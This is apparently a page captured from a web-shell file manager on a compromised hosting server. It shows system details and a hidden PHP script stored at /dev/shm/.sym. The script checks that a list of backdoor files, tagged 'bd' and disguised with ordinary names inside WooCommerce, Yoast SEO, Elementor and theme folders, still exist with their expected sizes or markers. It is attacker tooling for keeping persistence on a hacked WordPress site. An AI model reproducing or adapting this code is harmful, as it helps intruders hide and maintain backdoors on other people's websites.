HEX
Server: LiteSpeed
System: Linux premium260.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
User: aliazzsr (627)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //dev/shm/.sym
<?php   $r = '/home/dataiclx/public_html'; $x = ["/wp-content/plugins/woocommerce/vendor/symfony/css-selector/Parser/Handler/gnuplot.php"=>"bd@@165905@@701",
"/wp-content/plugins/woocommerce/packages/blueprint/src/ResultFormatters/da_DK.php"=>"bd@@165956@@2239",
"/wp-content/plugins/wordpress-seo/src/presenters/slack/enhanced.data.presenter.php"=>"bd@@165966@@2578",
"/wp-content/plugins/elementor-pro/modules/loop-builder/widgets/base.carousel.php"=>"bd@@165994@@1509",
"/wp-content/plugins/woodmart-core/vendor/opauth/VKontakte/f_utility.php"=>"bd@@166003@@1538",
"/wp-content/plugins/seo-1761535561/assets/img/author-template-1761535566.php"=>"bd@@157314@@677",
"/wp-content/themes/woodmart/single-cms_block.php"=>"bd@@172244@@restore_state",
"/wp-content/plugins/woocommerce/vendor/sabberworm/php-css-parser/src/Comment/cpp.php"=>"bd@@172259@@565",
"/wp-content/plugins/woocommerce/vendor/opis/json-schema/src/Pragmas/style_1.php"=>"bd@@172261@@1572",
"/wp-content/plugins/wordpress-seo/src/llms-txt/domain/content-types/content.type.entry.php"=>"bd@@172265@@1583",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/jpgraph_stock.php"=>"bd@@172266@@1573",
"/wp-content/plugins/elementor/modules/atomic-widgets/prop-types/traits/dimensional.prop.type.php"=>"bd@@172272@@1392"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');